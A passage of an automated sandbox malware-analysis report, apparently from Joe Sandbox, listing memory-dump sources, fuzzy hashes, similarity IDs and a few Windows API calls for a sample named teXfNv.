                                                                                                                                                          • Opcode Fuzzy Hash: b816242e7b19d6b188899068bb076270f8dbe794a578ab0b8505f65f04d1aa89
                                                                                                                                                          • Instruction Fuzzy Hash: 8F61D4B4E04228CFCB04DFA9C944AEEBBF6BF89311F109429E51AAB359DB355905CF50
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 05861296
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05867BC2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05867BC2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                          APIs
                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 0586A2C1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallProcWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2714655100-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 0160AE89
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1762720262.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_1600000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 0160AE89
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1762720262.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_1600000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          APIs
                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 058639B7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                          APIs
                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 058639B7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 05861296
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq
                                                                                                                                                          • API String ID: 0-2319236580
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: OijW
                                                                                                                                                          • API String ID: 0-3475513506
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: OijW
                                                                                                                                                          • API String ID: 0-3475513506
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          • Opcode Fuzzy Hash: 20ee70eeab5fe3f06d723bee2f7e7b2d028d6ab4fc0e98cfd36058e8f265c0f4
                                                                                                                                                          • Instruction Fuzzy Hash: 01319C74E0921ADFDB04DFA9D5806AEBBF2BF89311F14D4AAC011BB254D7349A41CF11
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d8366c0563c0dd1555fa7df35e69de572c7aedd3d0c6704c5cc6bd8ffa15d017
                                                                                                                                                          • Instruction ID: 3213efe1df72aafbeedbab61f842ef89caccfd1fe73807a7e31b71ac5e4b61d5
                                                                                                                                                          • Opcode Fuzzy Hash: d8366c0563c0dd1555fa7df35e69de572c7aedd3d0c6704c5cc6bd8ffa15d017
                                                                                                                                                          • Instruction Fuzzy Hash: AE312374E01219DFCB08DFA9E4456EEBBB2FF88301F10846AE815A7344DB349941CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 017ed803ec954aa21666bd0f1cb4e2c37e347ba2a30dd263da9b620016b22536
                                                                                                                                                          • Instruction ID: 368e88b5de405fb25666b00b3d29efe74fcbb97f6275163865c1752a83ce2ea8
                                                                                                                                                          • Opcode Fuzzy Hash: 017ed803ec954aa21666bd0f1cb4e2c37e347ba2a30dd263da9b620016b22536
                                                                                                                                                          • Instruction Fuzzy Hash: 50219174908158DFCB00EFA9C9449ACBFF9EF8A305B15D8D9D4099B36AD7309E40DB40
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1760866973.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_149d000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7f698ffb248f533de0b59fd63e38212a2cd671e9156085d2676c3acb91c612f7
                                                                                                                                                          • Instruction ID: d3bad7a35fb31ad126ed125163fd708292b4d876080bc0b2bb45a82ae244551d
                                                                                                                                                          • Opcode Fuzzy Hash: 7f698ffb248f533de0b59fd63e38212a2cd671e9156085d2676c3acb91c612f7
                                                                                                                                                          • Instruction Fuzzy Hash: 1421F471900204DFDF05DF58D9C0B67BF65FB94314F20C17AD9094B26AC336E456CAA1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1760917242.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_14ad000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: de70672741327aaa91a555f0e53be06375be3892bb2f09987b5d7b2b5f99c6a9
                                                                                                                                                          • Instruction ID: 49c7dfee171f02636e3edd78d7cd183b37fcf44ed0b84e9f5b1d134e4fd198fc
                                                                                                                                                          • Opcode Fuzzy Hash: de70672741327aaa91a555f0e53be06375be3892bb2f09987b5d7b2b5f99c6a9
                                                                                                                                                          • Instruction Fuzzy Hash: CA2145B0988200DFCB15DF58D980B17BFA1EB94318F60C56ED80A4B766C336C407CA61
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1760917242.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_14ad000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c6cb3d90a5a6d46e52f2cb59a07081bfa1a1da166c751c7f22d0472b72faae96
                                                                                                                                                          • Instruction ID: df4d5c2fef20c8b3906b1a128d60f34fc85b318e598a2d57346a082642f46e98
                                                                                                                                                          • Opcode Fuzzy Hash: c6cb3d90a5a6d46e52f2cb59a07081bfa1a1da166c751c7f22d0472b72faae96
                                                                                                                                                          • Instruction Fuzzy Hash: 67214972904200DFDB01DF98C9C0B26BBA5FB94324F60C57ED8094B762C336D446CA61
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e14235db00978244ff698a7d52e99263f2eade7aa81d0a67a3782c4eaec23951
                                                                                                                                                          • Instruction ID: 9f8871ba1eebbe88883f8f0ed24aa62232202119f42676e15a1652f38a7f833b
                                                                                                                                                          • Opcode Fuzzy Hash: e14235db00978244ff698a7d52e99263f2eade7aa81d0a67a3782c4eaec23951
                                                                                                                                                          • Instruction Fuzzy Hash: 22310770E0420ADFCB08DFA9C58199EBBF2FF89300F24C5AAD419A7214D730AA558F51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5668828f08145c72310abf05dfb0c241de39f5e03c4b86f7cf2550baa9c2d7d1
                                                                                                                                                          • Instruction ID: 7fe19212ca1187fa7e796053127fc8e475ee30866710c29a4280f1ac58141ad5
                                                                                                                                                          • Opcode Fuzzy Hash: 5668828f08145c72310abf05dfb0c241de39f5e03c4b86f7cf2550baa9c2d7d1
                                                                                                                                                          • Instruction Fuzzy Hash: 3F21F970E04219DFCB04DFA9C5459AEBBF2FB89300F24C5AAD419A7314D734AA518F51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 575bb937e9766c66ac16f621b1a5361ed378100fe9cf249b1470964192cf6825
                                                                                                                                                          • Instruction ID: 91e242497c3d19b9407b56ff6e651a9f9fdc4dd7a579a701566006a89b1930d4
                                                                                                                                                          • Opcode Fuzzy Hash: 575bb937e9766c66ac16f621b1a5361ed378100fe9cf249b1470964192cf6825
                                                                                                                                                          • Instruction Fuzzy Hash: 3A2115B4E05219DFCB44DFA9D9855AEBBF2EF89301F14C5AAD429E7314EB309A00CB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ad0901a3a28a8a3b4b54b5bde44dd1ff21b2716732aebc3bdc553783b3b7e3d8
                                                                                                                                                          • Instruction ID: 834a63e1f8f6eeffc6f36add6b2a2c42fe67c89579426affe574a617071a7262
                                                                                                                                                          • Opcode Fuzzy Hash: ad0901a3a28a8a3b4b54b5bde44dd1ff21b2716732aebc3bdc553783b3b7e3d8
                                                                                                                                                          • Instruction Fuzzy Hash: 3F210834A05308CFCB14EFA4D6989ADBBB6FBC8341B108529E40AAB369DB305C41CF21
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 31d08708b31c0aed9dd85f2cf887fda2753d803332fc9f0b12ce7a5a4181637b
                                                                                                                                                          • Instruction ID: 090390e764a459205f5953624d9a66d2992eced9decd7bef37d8ac4532a152aa
                                                                                                                                                          • Opcode Fuzzy Hash: 31d08708b31c0aed9dd85f2cf887fda2753d803332fc9f0b12ce7a5a4181637b
                                                                                                                                                          • Instruction Fuzzy Hash: D12127B0E0421ADFCB44DFAAC5416AEFBF2BF88300F10D5AA8405A7365E7349A019B91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1760917242.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_14ad000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ce64fa4f702d7e3a5767d02b8e5288fae121a3625bf4026ded585e94b23bd7c0
                                                                                                                                                          • Instruction ID: b7bd555bf5cc8fdc2830847733ccbb3699bcdf8aae46d548d9e1c56d8f389bf1
                                                                                                                                                          • Opcode Fuzzy Hash: ce64fa4f702d7e3a5767d02b8e5288fae121a3625bf4026ded585e94b23bd7c0
                                                                                                                                                          • Instruction Fuzzy Hash: A92192755493808FDB03CF24D594716BF71EB46218F29C5DBD8498F6A7C33A980ACB62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Opcode Fuzzy Hash: bf2640264bfb332ec13a7d9d25e23a9e775635af9a3c3ea07825710358b01f83
                                                                                                                                                          • Instruction Fuzzy Hash: 30113CB8A08118DFCB44DF99C4409ADBFF9FF89329F149599D458A735AC7309A41DB80
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 103130bf81e6d688d76604b271a0558168454b2a77b549a1eacbc14178cbef31
                                                                                                                                                          • Instruction ID: 4551cc3e91f29be2599f6cadf57352d07764f8dab0f93bd5abaf82a922ee0d3f
                                                                                                                                                          • Opcode Fuzzy Hash: 103130bf81e6d688d76604b271a0558168454b2a77b549a1eacbc14178cbef31
                                                                                                                                                          • Instruction Fuzzy Hash: DD111CB4E0561ADFCB48DFA9D5856AEFFF2FB88305F2085AAD409A3204E7305A41DB51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 48f4ebd10a76d9a1bc006a575c628f126ca19610e4d6d7108b094b27da44453e
                                                                                                                                                          • Instruction ID: 7d55fe088b0c46fb4fde7c224a94535e7549e6bbd665eb604bfd85bedfd31b75
                                                                                                                                                          • Opcode Fuzzy Hash: 48f4ebd10a76d9a1bc006a575c628f126ca19610e4d6d7108b094b27da44453e
                                                                                                                                                          • Instruction Fuzzy Hash: AB110CB4E0521ADFCB48DFA9D6416AEFBF2FB88305F20C46AD405A3304EB305A419B91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1760866973.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_149d000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7892eece87cd2ff00fdb9c5ec7bf6aa7c4efb863bbfaaf7d403cb8aff8fe62e2
                                                                                                                                                          • Instruction ID: e983af76a7de4b17b3188257ce7243bcb0262759d1202d20bfbede3edc041104
                                                                                                                                                          • Opcode Fuzzy Hash: 7892eece87cd2ff00fdb9c5ec7bf6aa7c4efb863bbfaaf7d403cb8aff8fe62e2
                                                                                                                                                          • Instruction Fuzzy Hash: 640120314043849AEB104A69CDC476FFFD8DF40324F18C467ED094A2A6C238D840C671
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2ac332babf651997a28a4d8681103e500f5c616d5ef4826feec984c04d2ebe57
                                                                                                                                                          • Instruction ID: 8fb74d07779b07769725e0a7b0e453ec527380b821c06300d88d0f57118e1b55
                                                                                                                                                          • Opcode Fuzzy Hash: 2ac332babf651997a28a4d8681103e500f5c616d5ef4826feec984c04d2ebe57
                                                                                                                                                          • Instruction Fuzzy Hash: 88015BB4E04219EFCB45DFE9D54129EBBF2EB88300F10C469C414A3305EB705A40CB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 40a86fccaa80e19b7f0d1a93ce483eabe574ac724c05f694003d1db752793d6e
                                                                                                                                                          • Instruction ID: 9096a42f42d15573aad5b1fbcf4c32cd699f493ff3c4d72e4b74f9c8ec01553e
                                                                                                                                                          • Opcode Fuzzy Hash: 40a86fccaa80e19b7f0d1a93ce483eabe574ac724c05f694003d1db752793d6e
                                                                                                                                                          • Instruction Fuzzy Hash: 6A01847090D254CFC704EF55D8419FDBFB8EF9A30AB1599A9D409AB22AC7304B44DB40
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 99fea349dbf783db636ed59b96413cb1647b6747066269042c349d7b294a88ed
                                                                                                                                                          • Instruction ID: 855fb39fb39469274ffbd14a8b6163c1326da0878108c21cc2a329c573c6c3d0
                                                                                                                                                          • Opcode Fuzzy Hash: 99fea349dbf783db636ed59b96413cb1647b6747066269042c349d7b294a88ed
                                                                                                                                                          • Instruction Fuzzy Hash: 880117B4E05219DFCB45DFE9D9416AEBBF6EB98301F10C4A9C419A3305EB70AA018B50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: df91e4fa64ed29ca38e2de0dc74146b68f833cc60e5518d90c8692444cf5c751
                                                                                                                                                          • Instruction ID: d35b7f74786fdf261133f4e75ae2a55c350fd5a7a583db16f885dbd8a5a70930
                                                                                                                                                          • Opcode Fuzzy Hash: df91e4fa64ed29ca38e2de0dc74146b68f833cc60e5518d90c8692444cf5c751
                                                                                                                                                          • Instruction Fuzzy Hash: 8001AC74A04118DFCB44EFA9C945AADBBF5EF49305F15D494D4099B255D6309E40DB40
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bbe882ebb4c344818886ac178e4341648e558cb6e5763c0c3458df531d32daa9
                                                                                                                                                          • Instruction ID: 77fbe756e6a6242020a52b891fe822922f7739858341f3121b04e7ee14b25ac8
                                                                                                                                                          • Opcode Fuzzy Hash: bbe882ebb4c344818886ac178e4341648e558cb6e5763c0c3458df531d32daa9
                                                                                                                                                          • Instruction Fuzzy Hash: 59112338905259CFC750DF69E584AACBBF9FB88352F449569E00DA7316DB309C85CF60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2086c2ae79cdfd94065df2ab7786e0cddf046baf2df3f61027843d66e235c744
                                                                                                                                                          • Instruction ID: 0628ca9c9c45ed08a6332cea9ae655ee330136552e9c97e36f6ba4a9f144ab19
                                                                                                                                                          • Opcode Fuzzy Hash: 2086c2ae79cdfd94065df2ab7786e0cddf046baf2df3f61027843d66e235c744
                                                                                                                                                          • Instruction Fuzzy Hash: 92F03C7090D158DFC704EF5AD9409BDBBBCAF9930AF14D9A8E409AB21AD7709B44DB80
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1760866973.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_149d000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2979cb1e0ea4fd7f3b91fbac95987ee382ca5b1d2d49712c7a3e61dff599acbe
                                                                                                                                                          • Instruction ID: 1ce6808aa0c8b329561fbc72662bf37e463153de51d4015c979a295e17861d65
                                                                                                                                                          • Opcode Fuzzy Hash: 2979cb1e0ea4fd7f3b91fbac95987ee382ca5b1d2d49712c7a3e61dff599acbe
                                                                                                                                                          • Instruction Fuzzy Hash: AFF096714043849EEB118A1ACDC4B67FFE8EF85775F18C95AED084F296C2799844CAB1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b672a77b8838a9844da52655c3a15238197668eb4648d908ffc8e4891de11ca5
                                                                                                                                                          • Instruction ID: d5dc43ae0c07933a3eaee9193d5d5bd7dc2be1299a1327e28d2a8df6954779d8
                                                                                                                                                          • Opcode Fuzzy Hash: b672a77b8838a9844da52655c3a15238197668eb4648d908ffc8e4891de11ca5
                                                                                                                                                          • Instruction Fuzzy Hash: C0F0B471508154AFDB05DB98DC008A97FB6EF8A220B1582AAE808DB2B5D2319D11C754
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
